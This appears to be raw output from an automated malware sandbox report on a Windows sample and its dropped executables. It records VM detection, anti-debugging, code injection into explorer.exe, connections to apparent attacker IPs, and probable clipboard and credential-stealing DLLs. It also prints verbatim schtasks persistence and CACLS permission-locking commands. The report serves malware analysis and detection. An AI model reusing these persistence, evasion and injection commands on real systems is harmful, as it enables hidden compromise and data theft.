Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99318
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99189
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 99060
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98940
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98792
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98675
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98559
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98434
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98290
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 98159
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97982
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97833
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97698
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97582
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97465
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97349
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97232
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 97117
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 96995
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 96879
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99889
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99609
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99452
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99343
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99233
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99124
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 99013
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98894
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98767
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98641
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98512
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98390
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98278
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98170
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 98062
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97953
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97841
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97734
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97624
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97514
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97395
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97267
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97144
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 97017
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 96859
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 96741
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 96624
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 96515
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 96393
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 96266
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: explorer.exe, 00000001.00000000.405139974.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: n7660022.exe, 0000001E.00000003.659775198.000000000B0B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000001.00000000.408676481.000000000F03A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.405139974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000001.00000000.405139974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.395173261.00000000043B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: n7660022.exe, 0000001E.00000003.658986796.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll``RTh
Source: ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: ohcompetitive.exe, 0000000D.00000002.726837895.0000000003300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen"select * from Win32_ComputerSystem
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: j8994074.exe, 0000001C.00000003.671740711.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareB2_EC73GWin32_VideoControllerBRFN9YB4VideoController120060621000000.000000-000548111.1display.infMSBDAR4DA1VY6PCI\VEN_15AD&D^C'Q4
Source: n7660022.exe, 0000001E.00000003.659775198.000000000B0B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareB2_EC73GWin32_VideoControllerBRFN9YB4VideoController120060621000000.000000-000548111.1display.infMSBDAR4DA1VY6PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsNCPTBS18
Source: explorer.exe, 00000001.00000000.405139974.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: ohcompetitive.exe, 0000000D.00000002.726837895.0000000003300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: j8994074.exe, 0000001C.00000003.671886733.000000000109A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareB2_EC73GWin32_VideoControllerBRFN9YB4VideoController120060621000000.000000-000548111.1display.infMSBDAR4DA1VY6PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsNCPTBS18p
Source: explorer.exe, 00000001.00000000.405139974.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ohcompetitive.exe, 0000000D.00000002.720800653.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000003.636090807.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\q4B165cujP.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00935467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

5_2_00935467

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00932390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_00932390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_00CE2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011BE59B FindFirstFileExW,	7_2_011BE59B

Source: C:\Users\user\Desktop\q4B165cujP.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	File Volume queried: C:\ FullSizeInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\q4B165cujP.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00932F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

5_2_00932F1D

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011BACC2 mov eax, dword ptr fs:[00000030h]		7_2_011BACC2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011B74C1 mov eax, dword ptr fs:[00000030h]		7_2_011B74C1

Source: C:\Users\user\Desktop\q4B165cujP.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: 7_2_011B9838 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_011B9838

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00936F40 SetUnhandledExceptionFilter,	5_2_00936F40
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00936CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00936CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE6F40 SetUnhandledExceptionFilter,	6_2_00CE6F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00CE6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011B9838 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_011B9838
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011B4F42 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_011B4F42
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Code function: 7_2_011B564E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_011B564E

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.91.124.47 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 77.91.68.248 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 77.91.68.29 80	Jump to behavior

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: B29C.exe.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\q4B165cujP.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\q4B165cujP.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

Memory written: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: 7_2_011A32A0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

7_2_011A32A0

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\q4B165cujP.exe	Thread created: C:\Windows\explorer.exe EIP: 29B1950			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfshvii	Thread created: unknown EIP: 55D1950			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "pdates.exe" /P "user:N"&&CACLS "pdates.exe" /P "user:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "user:N"&&CACLS "..\925e7e99c5" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\925e7e99c5" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\925e7e99c5" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_009318A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

5_2_009318A3

Source: explorer.exe, 00000001.00000000.394156647.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.397437134.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.405139974.00000000086B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.394156647.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000001.00000000.394156647.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.394156647.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.393861047.0000000000878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanLoc*U

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
